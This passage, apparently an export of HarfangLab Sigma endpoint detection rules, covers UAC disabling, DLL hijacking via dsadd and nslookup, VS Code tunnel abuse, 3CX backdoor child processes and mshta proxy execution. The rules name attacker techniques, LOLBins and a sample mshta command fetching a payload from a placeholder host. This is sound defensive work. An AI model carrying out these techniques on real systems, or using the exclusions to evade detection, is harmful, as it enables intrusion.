'?:\\Windows\\CCM\\SCNotification.exe.config'\n\n # CCM installer\n exclusion_msiexec:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "41d7267d-3dda-4c98-b61e-b8ef463ac92c",
"rule_name": "Windows Session Hijacking via SCNotification.exe Prepared",
"rule_description": "Detects the modification of the SCNotification.exe configuration file.\nAdversaries may abuse SCNotification.exe by modifying its configuration to execute an AppDomainManager payload and execute arbitrary commands.\nIt is recommended to check the content of the SCNotification.exe.config to identify any malicious content.\n",
"rule_creation_date": "2024-07-30",
"rule_modified_date": "2025-07-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1072"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "41d92614-4908-4b83-a287-690eb8445ed7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622813Z",
"creation_date": "2026-03-23T11:45:34.622815Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622819Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration",
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1548_uac_consent_config_disabled.yml",
"content": "title: UAC Registry Configuration Disabled\nid: 41d92614-4908-4b83-a287-690eb8445ed7\ndescription: |\n Detects a change in the User Account Control registry configuration.\n This rule detects the complete disabling of the UAC consent window.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate the process performing the registry edit to look for malicious content or actions.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://attack.mitre.org/techniques/T1548/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n Details: 'DWORD (0x00000000)'\n\n # This is handled by the rule 189eeb83-5aec-4186-97ea-ad22929a4f15\n # C:\\Windows\\system32\\UserAccountControlSettings.exe\n filter_useraccountsettings:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n - '?:\\Windows\\SysWOW64\\DllHost.exe /Processid:{EA2C6B24-C590-457B-BAC8-4A0F9B13B5B8}'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - 
'?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_ansible_powershell:\n ProcessImage|endswith: '\\powershell.exe'\n ProcessCommandLine|contains:\n # \"Ansible requires PowerShell v3.0 or newer\" UTF-16LE with all 3 offsets\n - 'QQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByA'\n - 'EAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcg'\n - 'BAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIA'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_clickshare:\n ProcessOriginalFileName:\n - 'clickshare.exe'\n - 'ClickShare_for_Windows.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Barco N.V.'\n\n exclusion_vaudio:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\VAudio\\Audckq32.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_cobas:\n ProcessOriginalFileName: 
'CobasInfinityInstaller.exe'\n\n exclusion_legitimate_programs:\n ProcessImage:\n - '?:\\Program Files (x86)\\wps-ipro2\\wps-ipro2.exe'\n - '?:\\Program Files (x86)\\black box whps\\whps.exe'\n - '?:\\Program Files (x86)\\logmein\\x64\\logmein.exe'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\sources\\setupplatform.exe'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_intune:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_vmware airWatch:\n # C:\\Program Files (x86)\\Airwatch\\AgentUI\\TaskScheduler.exe\n ProcessOriginalFileName: 'TaskScheduler.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'VMware, Inc.'\n\n exclusion_roche:\n ProcessOriginalFileName: 'RITS_InfinityModulesInstaller.exe'\n ProcessDescription: 'Roche IT Infinity Modules Installer'\n ProcessCompany: 'Roche Diagnostics'\n\n exclusion_wps-ipro:\n ProcessOriginalFileName: 'WPS-IPro2.exe'\n ProcessProduct: 'Wireless Presentation System'\n ProcessCompany: 'AWIND Inc.'\n\n exclusion_iagona:\n ProcessImage|contains: 'Neoscreen'\n ProcessDescription: 'Installation Pack'\n ProcessProduct: 'Neoscreen'\n ProcessCompany: 'IAGONA'\n\n # https://www.tranquil.it/\n exclusion_tranquil:\n ProcessGrandparentProduct: 'WAPT'\n ProcessGrandparentCompany: 'Tranquil IT'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Tranquil I.T. Systems'\n\n exclusion_sccm:\n ProcessAncestors|contains: '|?:\\MININT\\Tools\\X64\\TsManager.exe|?:\\MININT\\Tools\\X64\\TsmBootstrap.exe|'\n\n exclusion_provconnect:\n ProcessGrandparentImage: '?:\\Program Files\\proVconnect\\proVconnect Device Agent\\Device Agent\\bin\\proVconnect.Agent.Windows.exe'\n\n exclusion_ninjarmm:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgentPatcher.exe|?:\\Windows\\System32\\services.exe|'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "41d92614-4908-4b83-a287-690eb8445ed7",
"rule_name": "UAC Registry Configuration Disabled",
"rule_description": "Detects a change in the User Account Control registry configuration.\nThis rule detects the ConsentPromptBehaviorAdmin value being set to 0, which makes elevation requests from members of the local Administrators group succeed without any consent prompt.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate the process performing the registry edit to look for malicious content or actions, and to restore the previous value if the change cannot be attributed to a legitimate policy or deployment tool.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42063cd7-a184-4060-aa08-24504240bb0b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080798Z",
"creation_date": "2026-03-23T11:45:34.080800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080805Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsadd.yml",
"content": "title: DLL Hijacking via dsadd.exe\nid: 42063cd7-a184-4060-aa08-24504240bb0b\ndescription: |\n Detects potential Windows DLL Hijacking via dsadd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsadd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\netapi32.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42063cd7-a184-4060-aa08-24504240bb0b",
"rule_name": "DLL Hijacking via dsadd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsadd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42219252-5c4c-42ea-b6aa-3a48b6da5be0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623381Z",
"creation_date": "2026-03-23T11:45:34.623383Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623387Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/",
"https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_vs_code_tunnel.yml",
"content": "title: VSCode Proxy Tunnel Started\nid: 42219252-5c4c-42ea-b6aa-3a48b6da5be0\ndescription: |\n Detects the VSCode binary being executed with command-line arguments indicating the start of a VS Code network tunnel.\n Since July 2023, Microsoft Visual Studio Code includes a feature called Dev Tunnels that allows remote access to a system by exposing local services through Microsoft-managed infrastructure.\n Threat actors have abused this functionality to gain persistent remote access, bypass network restrictions, and evade traditional remote access detections by leveraging trusted Microsoft domains.\n It is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\nreferences:\n - https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2026/01/09\nmodified: 2026/01/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n CommandLine|contains: ' tunnel'\n Image|endswith:\n - 'code.exe'\n - 'code-tunnel.exe'\n - 'code-tunnel-insiders.exe'\n\n selection_imphash:\n CommandLine|contains: ' tunnel'\n Imphash:\n - 'c5cb69f09d753530411528e2a0041c10'\n - 'b2c20053c09c4ac294fac649bd52b9d7'\n 
- 'ffba461184ce9e88225c05180ed9ae0e'\n - 'ece9f6a03a1eb2222b33a67bd692cbcf'\n - '6b319b5d822e4d8976962e9f829623fa'\n - '8f37d2bc0de4d67940d0bd62c3aa8f2f'\n - 'd2b046a0864290ecddf0b1cbbd1fbdfa'\n - '39cbe2ab95201144169ebe4082bcd960'\n - '67481da3531c3eec93994a63859fbf85'\n - '346303b98cec2b81d96c84895a63295c'\n - '14d1060d69daaf2de5c9457a561d4145'\n - '127d26d854177e542674f64784c7ddb1'\n - 'f756ba36b253d4ceb47eaaa6e0069c6e'\n - '6e1c8155b811a1d8dff929558aa6751d'\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n selection_commandline:\n CommandLine|contains:\n - ' tunnel --accept-server-license-terms'\n - ' tunnel service install'\n - ' tunnel service internal-run'\n\n filter_commandline:\n CommandLine|contains:\n - ' tunnel status'\n - ' tunnel user login'\n - ' tunnel forward-internal'\n - ' tunnel kill'\n\n # Avoid multiple detection\n filter_explorer:\n CommandLine|contains: ' tunnel service internal-run'\n ParentImage: '?:\\Windows\\explorer.exe'\n\n condition: (((selection_binary or selection_imphash) and not filter_commandline) or selection_commandline) and not filter_explorer\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42219252-5c4c-42ea-b6aa-3a48b6da5be0",
"rule_name": "VSCode Proxy Tunnel Started",
"rule_description": "Detects the VSCode binary being executed with command-line arguments indicating the start of a VS Code network tunnel.\nSince July 2023, Microsoft Visual Studio Code includes a feature called Dev Tunnels that allows remote access to a system by exposing local services through Microsoft-managed infrastructure.\nThreat actors have abused this functionality to gain persistent remote access, bypass network restrictions, and evade traditional remote access detections by leveraging trusted Microsoft domains.\nIt is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\n",
"rule_creation_date": "2026-01-09",
"rule_modified_date": "2026-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "424e493f-40de-4ea2-ab95-466e6867c197",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601239Z",
"creation_date": "2026-03-23T11:45:34.601243Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601251Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://unprotect.it/technique/dll-search-order-hijacking/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nslookup.yml",
"content": "title: DLL Hijacking via nslookup.exe\nid: 424e493f-40de-4ea2-ab95-466e6867c197\ndescription: |\n Detects potential Windows DLL Hijacking via nslookup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://unprotect.it/technique/dll-search-order-hijacking/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'nslookup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DNSAPI.dll'\n - '\\mswsock.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "424e493f-40de-4ea2-ab95-466e6867c197",
"rule_name": "DLL Hijacking via nslookup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via nslookup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42845992-7070-4491-a6c9-45ef10ed971b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619238Z",
"creation_date": "2026-03-23T11:45:34.619240Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619245Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats",
"https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html",
"https://attack.mitre.org/techniques/T1195/002/"
],
"name": "t1195_002_3cx_spawning_suspicious_process.yml",
"content": "title: Suspicious Process Spawned by 3CXDesktopApp\nid: 42845992-7070-4491-a6c9-45ef10ed971b\ndescription: |\n Detects suspicious processes started by the 3CXDesktopApp software.\n In late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer in a wide supply chain attack.\n It is recommended to investigate the newly created process for suspicious activities.\nreferences:\n - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\n - https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html\n - https://attack.mitre.org/techniques/T1195/002/\ndate: 2023/03/31\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.3CX\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n ParentImage|endswith: '\\3CXDesktopApp.exe'\n\n selection_bin:\n OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - 'appvlp.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n - 'extrac32.exe' # https://twitter.com/ShadowChasing1/status/1557287930267578368\n\n condition: all of selection_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42845992-7070-4491-a6c9-45ef10ed971b",
"rule_name": "Suspicious Process Spawned by 3CXDesktopApp",
"rule_description": "Detects suspicious processes started by the 3CXDesktopApp software.\nIn late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer in a wide supply chain attack.\nIt is recommended to investigate the newly created process for suspicious activities.\n",
"rule_creation_date": "2023-03-31",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1195.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42b184cd-02dd-4a06-9de2-f8424574bac6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070967Z",
"creation_date": "2026-03-23T11:45:34.070969Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070973Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Mshta/",
"https://attack.mitre.org/techniques/T1218/005/"
],
"name": "t1218_005_mshta_cmd.yml",
"content": "title: Cmd Execution via mshta.exe\nid: 42b184cd-02dd-4a06-9de2-f8424574bac6\ndescription: |\n Detects the execution of cmd.exe by mshta.exe.\n Mshta can be used to proxy the execution of a malicious JScript that may use the \"WScript.shell\" ActiveX object to run arbitrary commands, which spawns an intermediary \"cmd.exe\".\n It is recommended to check the spawned process for suspicious activities.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mshta/\n - https://attack.mitre.org/techniques/T1218/005/\ndate: 2021/02/10\nmodified: 2025/04/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # mshta http://xxx.xxx.xxx.xxx:9999/OvJQ5 (Koadic)\n selection_child:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.EXE'\n\n selection_parent:\n ParentImage|endswith: '\\mshta.exe'\n\n exclusion_hp:\n ParentCommandLine|contains:\n - '\\Program Files\\HP\\'\n - '\\Program Files (x86)\\HP\\'\n\n exclusion_ping:\n CommandLine: '?:\\windows\\system32\\cmd.exe /c ping -n ? 
